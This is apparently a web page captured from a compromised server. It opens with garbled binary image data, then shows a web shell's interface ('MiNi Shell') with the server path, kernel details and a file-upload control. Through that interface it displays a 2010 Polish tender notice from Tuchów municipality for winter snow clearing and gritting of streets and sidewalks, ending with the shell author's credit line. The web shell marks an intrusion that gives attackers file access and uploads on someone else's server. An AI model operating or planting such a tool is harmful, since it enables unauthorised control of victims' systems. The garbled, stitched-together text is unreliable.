JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101008/325860-N-2010.html

<p class="kh_header"><b>Tuchów: ZIMOWe UTRZYMANIE ULIC,CHODNIKÓW I PLACÓW NA TERENIE GMINY TUCHÓW - 2010/2011</b><br>
<b>Numer ogłoszenia: 325860 - 2010; data zamieszczenia: 08.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchów , ul. Rynek 1, 33-170 Tuchów, woj. małopolskie, tel. 0146525218 w. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuchow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZIMOWe UTRZYMANIE ULIC,CHODNIKÓW I PLACÓW NA TERENIE GMINY TUCHÓW - 2010/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ulice I kat. odśnieżania
								
Standard: jezdnia odśnieżana na całej szerokości,  jezdnia  posypana na skrzyżowaniach dróg  i odcinkach o   pochyleniu > 4 % utrzymana stała przejezdność ulicy ( przyjmując   średnio 4 m. szerokości ulicy i 50 % do posypania)
Każdorazowy wyjazd na rejon musi być uzgodniony z pracownikiem Urzędu
odpowiedzialnym za utrzymanie dróg.

Łączna długość I kat 11 680 mb  - 11,68 km + 12,6 km = 24,28 km

Rynek				 400       mb -0,40 km
Kolejowa              		 1600     mb - 1,60 km
Reymonta        			 270       mb - 0,27 km
Jana Pawła II 		  	300	mb - 0,30km
Kościuszki 			  80	mb - 0,08 km
Plac Kościuszki 			 70	mb - 0,07 km
Szkolna 		           		130	mb - 0,13 km
Zielona 				500	mb - 0,50 km
Wołowa 			         	2 300 	mb - 2,30 km
Grochmala 		            	120	mb - 0,12 km
Polna 			            	  95 	mb - 0,95 km
Długa 				2 000 	mb - 2,00 km
Wróblewskiego 		        	2 000 	mb - 2,00 km
Żeromskiego 			180	mb - 0,18 km
Chopina 				150	mb - 0,15 km
Ogrodowa 			150	mb - 0,15 km
Szpitalna 			 150	mb - 0,15 km
Oś.Centrum do kotłowni 		180	mb - 0,18 km
Oś.Centrum do bloków	            	100	mb - 0,10 km
Wspólna                                          50	mb - 0,05 km
Buchcice pod Kościół                  	2 150	mb - 2,15 km
Piotrkowice-Łowczów              	5 100	mb - 5,10 km
Lubaszowa - II 		              700	mb - 0,70 km
Wołowa pod szkołę         		1 650	mb - 1,65 km
Piotrkowice                     		3 000	mb - 3,00 km
                             
Ulice odśnieżone i posypane po ustaniu opadów nie później niż do godz 6.00 a w ciągu dnia w miare potrzeb.

Materiał zabezpiecza wykonawca.

Ulice II kat. odśnieżania

Standard: jezdnia odśnieżana na całej szerokości, jezdnia posypana na skrzyżowaniach dróg   co stanowi 30 % danej   ulicy i odcinkach o pochyleniu > 4 % utrzymana stała   przejezdność ulicy /przyjmując średnio 4 m. szerokości ulicy/
Każdorazowy wyjazd na rejon musi być uzgodniony z pracownikiem Urzędu  odpowiedzialnym za utrzymanie dróg

Łączna długość ulic II kat 16 310 mb - 16,36 km
Łączna dł. 30 % ulic II kat. 4  900 mb -  4,9 km

Wysoka       				600 mb - 0,60 km
Kopernika    				400 mb - 0,40 km
Konopnickiej 				650 mb - 0,65 km
Dierżona					500 mb - 0,50 km
Kazimierza Wil.   				400 mb - 0,40 km
Widok           				300 mb - 0,30 km
Sikorskiego  				150 mb - 0,15 km
650-Lecia   				250 mb - 0,25 km
Bp. Wałegi 		          		1000 mb - 1,00 km
Św. Józefa  				850 mb - 0,85 km
Warzywna  + łącznik			600 mb - 0,60  km
Piotrowskiego   				150 mb - 0,15 km
Kąpielowa      				200 mb - 0,20 km
Podwale					300 mb - 0,30 km
Krótka					100 mb - 0,10 km
Graniczna		         		1 200 mb - 1,20 km
Górna + przewiązka	          		2 500 mb - 2,55 km
Młyńca					450 mb -  0,45 km
Drelicharza				250 mb -  0,25 km
Stawarza					350 mb -   0,35 km
Szafera					150 mb -   0,15 km
Okólna					900 mb - 0,90 km
Słoneczna + osiedle			700 mb -  0,70 km
Wyszyńskiego                        		200 mb -  0,20 km
Długa/boczne/                        		500  mb -  0,5 km
Nowa                                      		360 mb - 0,36 km
Brzozówki                            		1 600 mb -  1,60 km
Paderewskiego                        		300 mb  - 0,30 km
Promienna I			  	200  mb - 0,20 km
Promienna II                       	   	200 mb - 0,2   km

Materiał zabezpiecza wykonawca

Po ustaniu opadów ulice odśnieżone i posypane nie później niż po upływie 5 godzin.
Materiał zabezpiecza wykonawca.


Ulice III kat. odśnieżania

Standard: Utrzymana przejezdność drogi, posypane skrzyżowania z drogami  wyższego rzędu i odcinkami jezdni ze stromymi podjazdami, oraz  odcinkami o pochyleniu > 4% co stanowi 30 % danej ulicy,  średnia szerokość ulic 4 m

Każdorazowy wyjazd na rejon musi być uzgodniony z pracownikiem Urzędu  odpowiedzialnym za utrzymanie dróg

Łączna dł. III kat 9 300 mb - 9,3 km
łączna dł. 30 % ulic III kat.2 790 mb - 2,79 km

Łowiecka                                                 1 150 mb - 1,15 km
Ziołowa                                                      450 mb - 0,45 km
Przedmieście Górne		   		800 mb -   0,8 km
Strzelecka			          2 350 mb - 2,35 km
Działkowiczów			            250  mb - 0,25 km
Szafera                                             	900 mb -   0,90 km
Strzeleceka/Patyk/                                    1 500  mb -   150 km
Stroma			     	              50  mb - 0,05 km
Leśna boczna 			             450 mb - 0,45 km
Polna boczna			             200 mb - 0,20 km
Okólna 			                 	600 mb - 0,60 km
Brzozówki                                        	300 mb - 0,30 km
Jasna                                                         300 mb - 0,30 km

Materiał zabezpiecza wykonawca

Ulice odśnieżone i posypane w ciągu 24 godzin od ustania opadów
Materiał zabezpiecza wykonawca.
					

Ulice IV  kat. odśnieżania
				
Standard: odśnieżone i posypane bezpośrednio po ustaniu opadów śniegu. 

Wykaz chodników do odśnieżania i posypywania

Rynek -przejścia				390 m2
Rynek chodniki				360 m2
Przystanek PKS				100 m2
Plac targowy		            		 80 m2
Jana Pawła II+schody k/Śliwy		 610 m2
Reymonta			 	 485 m2
Grochmala		             	 180 m2
Przejście do oś.Centrum			  75 m2
Kolejowa	               			1000 m2
Szkolna			  		 245 m2
Daszyńskiego        			1280 m2
Mickiewicza           			6022 m2
Żeromskiego		             	230 m2
Kościuszki	 	              	100 m2
Chopina		   	 	 	100 m2
Jana III Sobieskiego    	  		730 m2
Wróblewskiego           			2913 m2
Deptak do Sokoła	   	  		300 m2
Zielona		   	  		750 m2
Ryglicka                   			1760 m2
Tarnowska                  			2128 m2
Kopernika		   	  		700 m2
Kazimierz Wielkiego	   	  		150 m2
Ogrodowa		      	    	80 m2
Ciąg pieszy od ul.Wspólnej do os.Centrum        210 m2
Plac Zabaw                              	 	200 m2
Leśna                                       	 	500 m2 

OGÓŁEM  21 678 m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedmiotowy warunek zostanie uznany za spełniony, jeżeli wykonawca  udokumentuje uprawnienia do występowania w obrocie prawnym. Działalność  prowadzona  na  potrzeby  wykonania  przedmiotu  zamówienia  nie  wymaga  posiadania  specjalnych  uprawnień.

Ocena  tego warunku będzie dokonana  na  podstawie:

- aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania składania ofert,  a  w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  zakresie  wymaganej  wiedzy  i  doświadczenia - Zamawiający  wymaga, aby  wykonawca  wykazał  się  co  najmniej 2  usługami  polegającymi  na  zimowym  utrzymaniu  dróg, chodników  lub placów  o  wartości  co  najmniej 200 000  PLN

Ocena  tego warunku będzie dokonana  na  podstawie:

- wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych,  usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem  dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie - załącznik  nr  6  SIWZ,

Do  każdej  pozycji  wyszczególnionej  w   załączniku  nr  6   SIWZ  należy  załączyć  dokument  potwierdzający  należyte  wykonanie  zamówienia. 
Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  zakresie   dysponowania  odpowiednim  potencjałem  technicznym   do  wykonania  zamówienia - Zamawiający  wymaga, aby  wykonawca  dysponował  odpowiednim  potencjałem  technicznym  do  wykonania  niniejszego  zamówienia. 

Ocena  tego warunku będzie dokonana  na  podstawie:
- wykazu narzędzzi, wyposażenia zakładu i urzadzeń technicznych dostępnych wykonawcy usług w celu realizacji zamóienia wraz z informacją o podstawie dysponowania tymi zasobami; 

Wymaga  się aby  Wykonawca  ubiegający  się  o  zamówienie  publiczne  dysponował lub posiadał następujący rodzaj sprzętu:
a/samochód  pługopiaskarka - 1 szt.
b/ciągnik  z  pługiem  przystosowanym  do  posypywania  nawierzchni  drogowych - 1 szt
c/dodatkowy sprzęt ciężki np. spychacz lub koparko ładowarka

W  przypadku  nie  posiadania  własnego  potencjału  technicznego  wskazanego  w  załaczniku  nr  8  należy  przedstawić  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego do  wykonania  niniejszego  zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  zakresie   dysponowania   osobami  zdolnymi   do  wykonania  zamówienia - Zamawiający  wymaga, aby  wykonawca  posiadał  lub  dysponował  odpowiednią  ilością  osób  /pracowników  fizycznych/ zdolnych do  wykonania zamówienia  w  ilości  nie mniejszej  niż  5

Ocena tego warunku będzie dokonana w oparciu o:

- oświadczenie  wykonawcy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

- wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i  wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - załącznik  nr  7  SIWZ,

Wykonawca  może  polegać  na  osobach  zdolnych  do  wykonania  zamówienia  innych  podmiotów, niezależnie od  charakteru  prawnego  łączących  go  z  nimi  stosunków, udowadniając  iż  będzie  dysponował  osobami  zdolnymi                  do  wykonania  zamówienia, w  szczególności  przedstawiając  pisemne  zobowiązanie  tych  podmiotów  do  oddania do  dyspozycji  niezbędnych  osób  na  okres  korzystania  z  nich  przy  wykonaniu  zamówienia.

W  przypadku  nie dysponowania  osobami  zdolnymi  do  wykonania  zamówienia i  nie  posiadania  potencjału  technicznego  należy  przedstawić  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego  i  osób  zdolnych  do  wykonania  zamówienia. 

Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  zakresie  wymaganej  sytuacji  ekonomicznej  i  finansowej  - Zamawiający  wymaga, aby  wykonawca  był  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej  na  kwotę nie mniejszą niż  200 000  PLN, oraz  że  znajduje  się  w  dobrej  sytuacji  finansowej  i  ekonomicznej. 

Ocena tego warunku zostanie dokonana  na  podstawie:

- opłaconej polisy, a w przypadku  jej  braku  innego  dokumentu  potwierdzającego, że  wykonawca  jest  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  związanej  z  przedmiotem  zamówienia
- oświadczenia, że wykonawca znajduje się w dobrej kondycji finansowej i ekonomicznej, złożonego w dokumencie                    o nazwie oświadczenie - załącznik nr 1  SIWZ

Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Projekt  umowy stanowi załącznik do Specyfikacji  Istotnych  Warunków Zamówienia.  W jej treści, która nie podlega negocjacjom podano wszelkie istotne dla zamawiającego warunki realizacji zamówienia.
Zamawiający  przewiduje  możliwość  wprowadzenia  zmian  do  zawartej  umowy  w  stosunku  do  treści  oferty  w następujących  okolicznościach.
1. Konieczności  wykonania  dodatkowych usług  w  przypadku:
a) wystąpienia  w  trakcie  realizacji  niniejszej  umowy  konieczności  wykonania  usług  dodatkowych
b) działaniem  zdarzeń  losowych
2. Zmniejszenia  zakresu  umownego  usług  z  przyczyn    niemożliwych  wcześniej do  przewidzenia  przez  Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tuchow.BIP Tuchow//Zamówienia  publiczne+ogłoszenia/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tuchowie, 33 - 170 Tuchów ul. Rynek 1, pokój nr 1
cena materiałów przetargowych jest bezpłatna..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2010 godzina 10:00, miejsce: Urząd Miejski w Tuchowie, 33 - 170 Tuchów ul. Rynek 1, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com